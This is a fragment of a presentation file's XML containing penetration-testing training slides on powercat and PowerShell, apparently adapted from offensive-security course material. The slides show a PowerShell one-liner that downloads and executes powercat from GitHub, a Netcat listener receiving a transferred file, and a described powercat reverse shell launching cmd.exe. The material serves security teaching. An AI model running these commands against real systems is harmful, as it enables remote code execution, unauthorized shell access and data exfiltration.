            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IEX (New-Object System.Net.Webclient).DownloadString(`https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Powercat File transfer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330200" y="2092960"/>
            <a:ext cx="11252200" cy="2882265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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Next, we wlll invoke powercat on Bob's computer. The -c option speclfies client mode and sets</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the listening IP address, -p specifies the port number to connect to, and -i indicates the local file</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that will be transferred remotely:</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7" name="Text Box 6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2427605"/>
            <a:ext cx="10506710" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>First, we run a Netcat listener on Alice's computer:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kali@kali:~$ sudo nc -lnvp 443 &gt; receiving_powercat.psl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>listening on [any] 443 ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 63661</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2278380"/>
            <a:ext cx="8210550" cy="1348105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5278755"/>
            <a:ext cx="9723755" cy="55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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Powercat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr lang="" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330200" y="1008380"/>
            <a:ext cx="11252200" cy="4598035"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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We will start a Netcat llstener on</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Alice's computer, and then Bob w ill use powercat to send a reverse shell.</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Next, Bob will use powercat to send a reverse shell. In this example. the -e option specifies the</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application to execute (cmd.exe) once a connection is made to a listening port:</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C:\Users\offsec&gt;</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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2113915"/>
            <a:ext cx="8150225" cy="819785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731770" y="3753485"/>
            <a:ext cx="7120890" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Blue Wav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3255</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>104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9</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="20" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Droid Sans Fallback</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Standard Symbols PS [URW ]</vt:lpstr>
      <vt:lpstr>Blue Waves</vt:lpstr>
      <vt:lpstr>Data Pie Charts</vt:lpstr>
      <vt:lpstr>Green Color</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>POWERSHELL</vt:lpstr>
      <vt:lpstr>POWERSHELL File transfer</vt:lpstr>
      <vt:lpstr>PowerShell Reverse Shell</vt:lpstr>
      <vt:lpstr>Powercat Installation</vt:lpstr>
      <vt:lpstr>Powercat File transfer</vt:lpstr>
      <vt:lpstr>Powercat File transfer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patiala-bot</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-12T11:13:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-12T11:13:45Z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1033-11.1.0.9604</vt:lpwstr>
  </property>
</Properties>
</file>